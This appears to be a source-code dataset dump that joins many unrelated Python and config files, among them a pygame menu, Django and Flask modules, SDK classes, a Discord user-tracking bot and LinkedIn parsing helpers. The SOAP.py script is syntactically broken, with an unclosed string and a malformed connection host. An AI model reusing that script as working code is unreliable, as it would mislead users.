The Player is challenged to kill enemies that are
roaming about. Proximity to the enemies triggers an
alert that causes them to chase and shoot at you.
How many enemies can you kill before you die?
Enjoy.
""".lstrip()
# Credits Back Button
self.font = pg.font.Font(None, 72)
pad_x = (size[0] - self.font.size("BACK")[0]) / 2
self.options = [Option("BACK", (100, size[1] - 50), self.font)]
def draw(self, *args):
# Draw Credits Text
screen = pg.display.get_surface()
size = pg.display.get_surface().get_size()
lines = self.text.splitlines()[1:]
for idx, l in enumerate(lines):
# Determine x padding
l_size = self._font.size(l)[0]
off_x = (size[0] - l_size) / 2
screen.blit(
self._font.render(l, True, (232, 122, 49)), (off_x, 10 + (idx * 30))
)
# Draw Back button
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
option.hovered = True
else:
option.hovered = False
option.draw()
def on_mouse(self):
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
return option.text
class GameOver:
def __init__(self):
self.font = pg.font.Font(None, 72)
self.size = pg.display.get_surface().get_size()
off_x = self.size[0] / 2
off_y = self.size[1] / 2
self.options = [
Option("RESTART", (off_x, self.size[1] - 250), self.font),
Option("MAIN MENU", (off_x, self.size[1] - 150), self.font),
Option("EXIT", (off_x, self.size[1] - 50), self.font),
]
# Title image
path = os.path.join(os.path.dirname(__file__), "media")
file = "title.png"
self.title = pg.image.load(os.path.join(path, file))
self.title_rect = self.title.get_rect(center=(off_x, 70))
# Enemies killed text
self.font = pg.font.Font(None, 72)
def draw(self, *args):
off_x = self.size[0] / 2
off_y = self.size[1] / 2
# Draw title image
screen = pg.display.get_surface()
screen.blit(self.title, self.title_rect)
# Draw Killed text
text = " {} enemies killed !".format(args[0])
self.killed_text = self.font.render(text, True, (230, 0, 0))
self.killed_rect = self.killed_text.get_rect(center=(off_x, off_y - 100))
screen.blit(self.killed_text, self.killed_rect)
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
option.hovered = True
else:
option.hovered = False
option.draw()
def on_mouse(self):
for option in self.options:
if option.rect.collidepoint(pg.mouse.get_pos()):
return option.text
class PauseMenu:
def __init__(self):
self.font = pg.font.Font(None, 72)
size = pg.display.get_surface().get_size()
off_x = size[0] / 2
off_y = size[1] / 2
text = "PAUSED"
self.text_surf = self.font.render(text, True, (232, 122, 49))
self.text_rect = self.text_surf.get_rect()
self.text_rect.center = (off_x, off_y)
def draw(self, *args):
screen = pg.display.get_surface()
screen.blit(self.text_surf, self.text_rect)
class MenuSystem:
def __init__(self):
self.active = True
self.active_menu = 0
self.menus = [MainMenu(), Credits(), GameOver(), PauseMenu()]
# Game State
self.quit = False
pg.mixer.music.load(media_path("menu_loop.wav"))
pg.mixer.music.play(-1, 0.0)
def draw(self, *args):
self.menus[self.active_menu].draw(*args)
def on_mouse(self, reset_func):
option = self.menus[self.active_menu].on_mouse()
if option == "PLAY GAME":
self.active = False
elif option == "EXIT":
self.quit = True
elif option == "CREDITS":
self.set_credits()
elif option == "BACK":
self.set_main()
elif option == "RESTART":
reset_func()
pg.mixer.music.play(-1, 0.0)
self.active = False
elif option == "MAIN MENU":
reset_func()
self.set_main()
def set_main(self):
self.active_menu = 0
pg.mixer.music.play(-1, 0.0)
def set_credits(self):
self.active_menu = 1
def set_gameover(self):
self.active_menu = 2
pg.mixer.music.stop()
def set_pause(self):
self.active_menu = 3
| [
"[email protected]"
] | |
21190bb8e62dd782eafae6f70363d5471f54ebd4 | 39b35326534d6efa8a60344ef59eac3d8cea562f | /crudpj/crudpj/wsgi.py | b639603353b77ea9655595ff087206ea6ebb8995 | [] | no_license | Hyo-gyeong/Django_review | 8635e8311111cab56066c6b87429c7f57c5e42c3 | 8b59d717c0c8c4404230c8eaa42e6074cacdd712 | refs/heads/master | 2021-01-03T08:32:06.706689 | 2020-08-31T04:55:59 | 2020-08-31T04:55:59 | 240,000,924 | 0 | 0 | null | 2020-08-17T19:21:30 | 2020-02-12T11:53:19 | Python | UTF-8 | Python | false | false | 405 | py | """
WSGI config for crudpj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'crudpj.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
7bc9374380a24a79542e58d5423b623c5ffdaee6 | db3ba5776866f978fc2da97c8ac99ca3488a31dc | /production/orders/urls.py | c5c086fdc9bdfb0d1247a082bf8b77cd9ec40e00 | [] | no_license | barguello/AmpersandCopy | b7c2216f2ff4530e24f91233dc8332850a375988 | cc3e20960bf057d9101c3d4f0cac1b61bdef9089 | refs/heads/master | 2021-01-10T14:03:38.315929 | 2016-02-24T03:51:59 | 2016-02-24T03:51:59 | 52,412,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from django.conf.urls import patterns, url, include
import views
urlpatterns = patterns('',
url(r'^$', views.OrderFilterListView.as_view(), name="order_list"),
url(r'^import/$', views.order_import.as_view(), name="temp")
)
| [
"[email protected]"
] | |
591547196666ba74696882e924b9b0092ccb2e48 | b52a1091fbd167a060466b05d7b611f1a5ef24f9 | /SOAP.py | adbf0ae163111acb886bf5e977fde6e251bf99ae | [] | no_license | geoffreywestGIS/pythonscripts | 5cc765c1208e5ed61fe4c00645ee7a831751a3d3 | 50b1421999961441f9641ce3ee97880fe9eb5a0c | refs/heads/master | 2021-03-12T20:27:10.296344 | 2015-03-31T18:01:25 | 2015-03-31T18:01:25 | 32,751,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | import string, os, sys
import httplib
server_addr = httplib. HTTPConnection('67.227.0.42/arcgis/services/FeatureMapService/MapServer/FeatureServer?wsdl:6080')
service_action = "/services?wsdl/GetServiceDescriptionsEx"
body = """
<soapenv:Envelope xmlns:soapenv="http://www.esri.com/schemas/ArcGIS/10.1" xmlns:ns="http://schemas.xmlsoap.org/wsdl/">
<soapenv:Header/>
<soapenv:Body>
<ns:GetServiceDescriptionsEx>
</ns:GetServiceDescriptionsEx>
</soapenv:Body>
</soapenv:Envelope>
request = httplib.HTTPConnection('67.227.0.42/arcgis/services/FeatureMapService/MapServer/FeatureServer?wsdl:6080')
request.putrequest("POST", service_action)
request.putheader("Accept", "application/soap+xml, application/dime, multipart/related, text/*")
request.putheader("Content-Type", "text/xml; charset=utf-8")
request.putheader("Cache-Control", "no-cache")
request.putheader("Pragma", "no-cache")
request.putheader("SOAPAction", "http://" + server_addr + service_action)
request.putheader("Content-Length", str(len(body)))
request.endheaders()
request.send(body)
response = request.getresponse().read()
print response | [
"[email protected]"
] | |
9d45a3bb593edb5c2ffcac2a4fb25732dd6a03a8 | c3d82f3e13dcb72446257694d2f2828a903d11d3 | /final2/users/admin.py | 531b6e8780ab5acf77f0ae73bdc14d3e4e879fd8 | [] | no_license | danielchain3/Hotdog-Not-Hotdog | 610de58842a9df5531906a7f391a5d2f8a1e4949 | 986bb253f86e22059886d8cc400ce02d674b32e3 | refs/heads/master | 2022-12-18T04:17:32.805173 | 2019-12-16T00:47:29 | 2019-12-16T00:47:29 | 225,662,289 | 0 | 1 | null | 2022-12-08T03:18:17 | 2019-12-03T16:09:19 | Python | UTF-8 | Python | false | false | 447 | py | from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = CustomUser
list_display = ['email', 'username','id']
admin.site.register(CustomUser, CustomUserAdmin) | [
"[email protected]"
] | |
69902164ea9b3ea1f9ce378a4254075c62c0dac7 | bc0938b96b86d1396cb6b403742a9f8dbdb28e4c | /aliyun-python-sdk-alidns/aliyunsdkalidns/request/v20150109/DescribeDomainStatisticsRequest.py | 067b160a177535f3387786359d536dd3e134c0fa | [
"Apache-2.0"
] | permissive | jia-jerry/aliyun-openapi-python-sdk | fb14d825eb0770b874bc123746c2e45efaf64a6d | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | refs/heads/master | 2022-11-16T05:20:03.515145 | 2020-07-10T08:45:41 | 2020-07-10T09:06:32 | 278,590,780 | 0 | 0 | NOASSERTION | 2020-07-10T09:15:19 | 2020-07-10T09:15:19 | null | UTF-8 | Python | false | false | 1,896 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkalidns.endpoint import endpoint_data
class DescribeDomainStatisticsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Alidns', '2015-01-09', 'DescribeDomainStatistics','alidns')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_DomainName(self):
return self.get_query_params().get('DomainName')
def set_DomainName(self,DomainName):
self.add_query_param('DomainName',DomainName)
def get_StartDate(self):
return self.get_query_params().get('StartDate')
def set_StartDate(self,StartDate):
self.add_query_param('StartDate',StartDate)
def get_EndDate(self):
return self.get_query_params().get('EndDate')
def set_EndDate(self,EndDate):
self.add_query_param('EndDate',EndDate)
def get_Lang(self):
return self.get_query_params().get('Lang')
def set_Lang(self,Lang):
self.add_query_param('Lang',Lang) | [
"[email protected]"
] | |
498e8a90ccaf27eae56b85de8b72e5e374d54131 | 7a333c69d854d86761a7581fffa1c16d73f12cb6 | /selenium/venv/bin/pip3 | 11404631f19763f89536808d54160c7b11a122ac | [] | no_license | chestnut-egg/selenium | f81ccbf0adbbf6101058a63ff4c7be755d2f6b3b | 5bdd914672e4ac90bed70eb3d5882f9697abb668 | refs/heads/master | 2020-06-02T07:55:16.997757 | 2019-06-10T03:27:31 | 2019-06-10T03:27:31 | 191,089,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | #!/home/ppg/PycharmProjects/selenium/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | ||
e2b58782ad188be442ae49e9a7cc718b463abe1a | 8b60b2b9946af0a441bde689a4c9e43f29fb40ac | /node_modules/browser-sync/node_modules/chokidar/node_modules/fsevents/build/config.gypi | b119c6204c99fc86f750da484afc9c1af3454abd | [
"MIT",
"Apache-2.0"
] | permissive | shura-sparrow/raketa | bf3a3e6cb535377351b8d08ea82adc418707721a | f44c1f143800197c7beb3b89702be48b7b6272f5 | refs/heads/master | 2020-06-05T10:17:02.592220 | 2015-09-08T20:41:37 | 2015-09-08T20:41:37 | 41,766,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,738 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"uv_library": "static_library",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/Users/shurasparrow/.node-gyp/0.12.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/shurasparrow/.npm-init.js",
"userconfig": "/Users/shurasparrow/.npmrc",
"node_version": "0.12.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/shurasparrow/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.13.5 node/v0.12.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/4n/gvf_pkbj2fb6zyby4xf6z7ph0000gp/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"[email protected]"
] | |
d5d687a261f1ff22ddbc2e8327a32492a9ccd1d9 | 87fbca6990c8cb0185fdecae7ac70f931332f7f3 | /User.py | 0986dde0043f8c387e85834e55d02931fd14b1ec | [] | no_license | Sulfurixar/Elybot | 7dd09154e2f85ec7caf62efd710566bf7bf6965c | 0ccb2d248af055f811842ad4e3c20344f24b6801 | refs/heads/master | 2020-04-24T10:40:30.767517 | 2019-02-21T16:05:41 | 2019-02-21T16:05:41 | 171,901,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,340 | py | from Utils import Utils
import datetime
import discord
import json
import copy
import os
class User(object):
def __init__(self, data, server, user):
self.user_config_path = os.path.join(server.user_path, '{}.json'.format(user.id))
self.user = user
self.server = server
self.data = data
self.config_template = {
'id': user.id,
'bot': user.bot,
'created_at': user.created_at.strftime('%d-%m-%Y_%H-%M-%S-%f'),
'name': {
'current': '',
'previous': {}
},
'discriminator': {
'current': '',
'previous': {}
},
'display_name': {
'current': '',
'previous': {}
},
'roles': {
'current': {},
'previous': {}
},
'voice': {
'current': {},
'previous': {}
},
'joined_at': {
'current': '',
'previous': {}
},
'status': {
'current': '',
'previous': {}
},
'game': {
'current': {},
'previous': {}
},
'colour': {
'current': '',
'previous': {}
},
'bans': {
'current': 'not banned',
'previous': {}
},
'activity': {}
}
self.config = self.load_user()
self.update()
def load_user(self):
if not os.path.exists(self.server.path):
os.mkdir(self.server.path)
if not os.path.exists(self.server.server_path):
os.mkdir(self.server.server_path)
if not os.path.exists(self.user_config_path):
self.write_config(conf=self.config_template)
try:
with open(self.user_config_path, 'r') as f:
js = json.load(f)
except ValueError:
js = copy.deepcopy(self.config_template)
return js
def update_value(self, value, new_value, time=None):
if time is None:
time = Utils.get_full_time_string()
if value not in self.config:
self.config[value] = copy.deepcopy(self.config_template[value])
if 'current' not in self.config[value]:
self.config[value]['current'] = new_value
return
compare = True
if isinstance(new_value, dict) and isinstance(self.config[value]['current'], dict):
compare = self.comparer(new_value, self.config[value]['current'])
if str(self.config[value]['current']) != str(new_value) and compare:
if str(self.config[value]['current']) != '' \
and self.config[value]['current'] != {}:
if 'previous' in self.config[value]:
self.config[value]['previous'].update({time: self.config[value]['current']})
else:
self.config[value]['previous'] = {time: self.config[value]['current']}
self.config[value]['current'] = new_value
def comparer(self, dict1, dict2):
if len(dict1) != len(dict2):
return True
for key in dict1:
if key not in dict2:
return True
if dict1[key] is dict and dict2[key] is dict:
if self.comparer(dict1[key], dict2[key]):
return True
elif dict1[key] is dict and dict2[key] is not dict:
return True
else:
if dict1[key] != dict2[key]:
return True
return False
def update_activity(self, channel):
time = datetime.datetime.now()
hour = str(time.hour)
day = str(time.day)
month = str(time.month)
year = str(time.year)
template = {
year: {
month: {
day: {
hour: {
str(channel.id): 1
}
}
}
}
}
if 'activity' not in self.config:
self.config['activity'] = template
return
template = template[year]
config = self.config['activity']
if year not in config:
config[year] = template
return
template = template[month]
config = config[year]
if month not in config:
config[month] = template
return
template = template[day]
config = config[month]
if day not in config:
config[day] = template
return
template = template[hour]
config = config[day]
if hour not in config:
config[hour] = template
return
template = template[str(channel.id)]
config = config[hour]
if str(channel.id) not in config:
config[str(channel.id)] = template
else:
config[str(channel.id)] = config[str(channel.id)] + 1
def check_name(self):
self.update_value('name', self.user.name)
def check_display_name(self):
self.update_value('display_name', self.user.display_name)
def check_discriminator(self):
self.update_value('discriminator', self.user.discriminator)
def check_roles(self):
roles = {}
for role in self.user.roles:
roles[role.id] = {
'name': role.name, 'permissions': role.permissions.value, 'colour': role.colour.value,
'position': role.position, 'created_at': role.created_at.strftime('%d-%m-%Y_%H-%M-%S-%f')
}
self.update_value('roles', roles)
def check_voice(self):
state = {
'server_deaf': self.user.voice.deaf,
'server_mute': self.user.voice.mute,
'self_mute': self.user.voice.self_mute,
'self_deaf': self.user.voice.self_deaf,
'is_afk': self.user.voice.is_afk,
}
if self.user.voice.voice_channel is not None:
state['channel'] = {
'id': self.user.voice.voice_channel.id,
'name': self.user.voice.voice_channel.name,
'private': self.user.voice.voice_channel.is_private
}
else:
state['channel'] = {
'id': None,
'name': None,
'private': None
}
self.update_value('voice', state)
def check_joined_at(self):
self.update_value('joined_at', self.user.joined_at.strftime('%d-%m-%Y_%H-%M-%S-%f'))
def check_status(self):
self.update_value('status', str(self.user.status))
def check_game(self):
game = {
'name': None,
'url': None,
'type': None
}
if self.user.game is not None:
game = {
'name': self.user.game.name,
'url': self.user.game.url,
'type': self.user.game.type
}
self.update_value('game', game)
def check_colour(self):
self.update_value('colour', self.user.colour.value)
def check_config_values(self):
self.check_name()
self.check_discriminator()
self.check_display_name()
self.check_status()
self.check_game()
if str(type(self.user)) == str(discord.member.Member):
self.check_roles()
self.check_voice()
self.check_joined_at()
self.check_colour()
def write_config(self, conf=None):
if conf is None:
conf = self.config
with open(self.user_config_path, 'w+')as f:
json.dump(conf, f, indent=4)
f.close()
def update(self):
Utils(self.data).update(copy.deepcopy(self.config_template), self.config)
self.check_config_values()
self.write_config()
| [
"[email protected]"
] | |
780964a1b244dc8494d1e94aa7ffa9022b5d450e | 540f1e3233b2bee5248ff95d65b6be4be53203b1 | /venv/bin/easy_install-3.6 | c4325e86f59b04b1da39d5ab5928c355714f6f08 | [] | no_license | ArijitR111Y/Python-programming-exercises | 2db108134d0109b2e1bb202fa54f36abab560972 | 6e4c258bb8d590db5ba527dde24e2fc67dcf7fd1 | refs/heads/master | 2020-03-26T17:34:17.830803 | 2018-10-28T06:56:15 | 2018-10-28T06:56:15 | 145,168,707 | 0 | 0 | null | 2018-08-17T21:37:45 | 2018-08-17T21:37:44 | null | UTF-8 | Python | false | false | 476 | 6 | #!/home/arijit/Documents/Github_Repos/Python-programming-exercises/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"[email protected]"
] | |
dd4d0d6c201679d893bb319a03af2a7033948222 | 31f4cab278d83a755f1e434f35273223b049d172 | /bugs/accumulo/5594b2e0/test/system/bench/lib/Benchmark.py | ae1fafcbabbaac4fae672042ac01f414b4e77712 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | JenniferJohnson89/bugs_dot_jar_dissection | 2a017f5f77772ddb2b9a5e45423ae084fa1bd7a0 | 7012cccce9a3fdbfc97a0ca507420c24650f6bcf | refs/heads/main | 2022-12-28T16:38:18.039203 | 2020-10-20T09:45:47 | 2020-10-20T09:45:47 | 305,639,612 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import os
import glob
import sys
from options import log
from path import accumulo
class Benchmark(unittest.TestCase):
username = ''
password = ''
zookeepers = ''
instance = ''
def __init__(self):
unittest.TestCase.__init__(self)
self.finished = None
def name(self):
return self.__class__.__name__
def setUp(self):
# verify accumulo is running
self.start = time.time()
def tearDown(self):
self.stop = time.time()
log.debug("Runtime: %.2f", self.stop - self.start)
self.finished = True
def runTime(self):
return self.stop - self.start
def score(self):
if self.finished:
return self.runTime()
return 0.
# Each class that extends Benchmark should overwrite this
def setSpeed(self, speed):
print "Classes that extend Benchmark need to override setSpeed."
def setUsername(self, user):
self.username = user
def getUsername(self):
return self.username
def setPassword(self, password):
self.password = password
def getPassword(self):
return self.password
def setZookeepers(self, zookeepers):
self.zookeepers = zookeepers
def getZookeepers(self):
return self.zookeepers
def setInstance(self, instance):
self.instance = instance
def getInstance(self):
return self.instance
def sleep(self, tts):
time.sleep(tts)
def needsAuthentication(self):
return 0
def findjar(self, path):
globjar = glob.glob(path)
for j in globjar:
if j.find('javadoc') >= 0 or j.find('sources') >= 0:
globjar.remove(j)
return globjar[0]
# Returns the location of the local examples jar
def getexamplejar(self):
return self.findjar(accumulo() + '/lib/accumulo-examples*.jar')
# Returns a string of core, thrift and zookeeper jars with a specified delim
def getjars(self, delim=','):
accumulo_core_jar = self.findjar(accumulo('lib', 'accumulo-core*.jar'))
accumulo_start_jar = self.findjar(accumulo('lib', 'accumulo-start*.jar'))
accumulo_thrift_jar = self.findjar(accumulo('lib', 'libthrift*.jar'))
accumulo_zookeeper_jar = self.findjar(os.path.join(os.getenv('ZOOKEEPER_HOME'), 'zookeeper*.jar'))
return delim.join([accumulo_core_jar, accumulo_thrift_jar, accumulo_zookeeper_jar, accumulo_start_jar])
# Builds the running command for the map/reduce class specified sans the arguments
def buildcommand(self, classname, *args):
return [accumulo('bin', 'accumulo'), classname, '-libjars', self.getjars()] + list(map(str, args))
| [
"[email protected]"
] | |
3d6106b6e7e3d37af803f11255cad2346a387720 | 434a76f2a39b6152e18f25c092e2d3e272bcaa7d | /api/views/blockchains/resources.py | b30b53e5a6ba756d1d935653476963c9e299f4e2 | [
"Apache-2.0"
] | permissive | DaCeige/machinaris | fce98168d0ec288b47c37662079cbb928975badc | 2d3837c8af00bb41162f8be1cbf6eaf1cb6c6fdb | refs/heads/main | 2023-08-24T13:10:22.511119 | 2021-10-07T18:55:25 | 2021-10-07T18:55:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,326 | py | import datetime as dt
from flask.views import MethodView
from api import app
from api.extensions.api import Blueprint, SQLCursorPage
from common.extensions.database import db
from common.models import Blockchain
from .schemas import BlockchainSchema, BlockchainQueryArgsSchema
blp = Blueprint(
'Blockchains',
__name__,
url_prefix='/blockchains',
description="Operations on blockchains"
)
@blp.route('/')
class Blockchains(MethodView):
@blp.etag
@blp.arguments(BlockchainQueryArgsSchema, location='query')
@blp.response(200, BlockchainSchema(many=True))
@blp.paginate(SQLCursorPage)
def get(self, args):
return db.session.query(Blockchain).filter_by(**args)
@blp.etag
@blp.arguments(BlockchainSchema)
@blp.response(201, BlockchainSchema)
def post(self, new_item):
item = db.session.query(Blockchain).filter(Blockchain.hostname==new_item['hostname'], \
Blockchain.blockchain==new_item['blockchain']).first()
if item: # upsert
new_item['created_at'] = item.created_at
new_item['updated_at'] = dt.datetime.now()
BlockchainSchema().update(item, new_item)
else: # insert
item = Blockchain(**new_item)
db.session.add(item)
db.session.commit()
return item
@blp.route('/<hostname>/<blockchain>')
class BlockchainsByHostname(MethodView):
@blp.etag
@blp.response(200, BlockchainSchema)
def get(self, hostname):
return db.session.query(Blockchain).get_or_404(hostname)
@blp.etag
@blp.arguments(BlockchainSchema)
@blp.response(200, BlockchainSchema)
def put(self, new_item, hostname, blockchain):
item = db.session.query(Blockchain).get_or_404(hostname)
new_item['hostname'] = item.hostname
new_item['created_at'] = item.created_at
new_item['updated_at'] = dt.datetime.now()
blp.check_etag(item, BlockchainSchema)
BlockchainSchema().update(item, new_item)
db.session.add(item)
db.session.commit()
return item
@blp.etag
@blp.response(204)
def delete(self, hostname):
item = db.session.query(Blockchain).get_or_404(hostname)
blp.check_etag(item, BlockchainSchema)
db.session.delete(item)
db.session.commit() | [
"[email protected]"
] | |
8ba11f2ef590038ba7088d6471103e17aea99a38 | 08301e2a1a775ddbb25cfe04c8ed62afcd9b428b | /utils/helpers.py | 2945b7b949339d9a18dde0d58d53e253b70a1c43 | [] | no_license | KateShapovalova/linkedin | 0a1f5f583bfdb57b1fdbb64a086eb0699aafca74 | 17885e4c8b7641b3487403dc1c656bcc3d025d0c | refs/heads/master | 2023-06-06T01:28:15.532775 | 2021-06-24T12:25:33 | 2021-06-24T12:25:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,800 | py | def get_id_from_urn(urn):
"""
Return the ID of a given Linkedin URN.
Example: urn:li:fs_miniProfile:<id>
"""
return urn.split(":")[3]
def get_urn_from_raw_update(raw_string):
"""
Return the URN of a raw group update
Example: urn:li:fs_miniProfile:<id>
Example: urn:li:fs_updateV2:(<urn>,GROUP_FEED,EMPTY,DEFAULT,false)
"""
return raw_string.split("(")[1].split(",")[0]
def get_update_author_name(d_included):
"""Parse a dict and returns, if present, the post author name
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:return: Author name
:rtype: str
"""
try:
return d_included["actor"]["name"]["text"]
except KeyError:
return ""
except TypeError:
return "None"
def get_update_old(d_included):
"""Parse a dict and returns, if present, the post old string
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:return: Post old string. Example: '2 mo'
:rtype: str
"""
try:
return d_included["actor"]["subDescription"]["text"]
except KeyError:
return ""
except TypeError:
return "None"
def get_update_content(d_included, base_url):
"""Parse a dict and returns, if present, the post content
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param base_url: site URL
:type base_url: str
:return: Post content
:rtype: str
"""
try:
return d_included["commentary"]["text"]["text"]
except KeyError:
return ""
except TypeError:
try:
urn = get_urn_from_raw_update(d_included["*resharedUpdate"])
return f"{base_url}/feed/update/{urn}"
except KeyError:
return "IMAGE"
except TypeError:
return "None"
def get_update_author_profile(d_included, base_url):
"""Parse a dict and returns, if present, the URL corresponding the profile
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param base_url: site URL
:type base_url: str
:return: URL with either company or member profile
:rtype: str
"""
try:
urn = d_included["actor"]["urn"]
except KeyError:
return ""
except TypeError:
return "None"
else:
urn_id = urn.split(":")[-1]
if "company" in urn:
return f"{base_url}/company/{urn_id}"
elif "member" in urn:
return f"{base_url}/in/{urn_id}"
def get_update_url(d_included, base_url):
"""Parse a dict and returns, if present, the post URL
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param base_url: site URL
:type base_url: str
:return: post url
:rtype: str
"""
try:
urn = d_included["updateMetadata"]["urn"]
except KeyError:
return ""
except TypeError:
return "None"
else:
return f"{base_url}/feed/update/{urn}"
def append_update_post_field_to_posts_list(d_included, l_posts, post_key, post_value):
"""Parse a dict and returns, if present, the desired value. Finally it
updates an already existing dict in the list or add a new dict to it
:param d_included: a dict, as returned by res.json().get("included", {})
:type d_included: dict
:param l_posts: a list with dicts
:type l_posts: list
:param post_key: the post field name to extract. Example: 'author_name'
:type post_key: str
:param post_value: the post value corresponding to post_key
:type post_value: str
:return: post list
:rtype: list
"""
elements_current_index = len(l_posts) - 1
if elements_current_index == -1:
l_posts.append({post_key: post_value})
else:
if post_key not in l_posts[elements_current_index]:
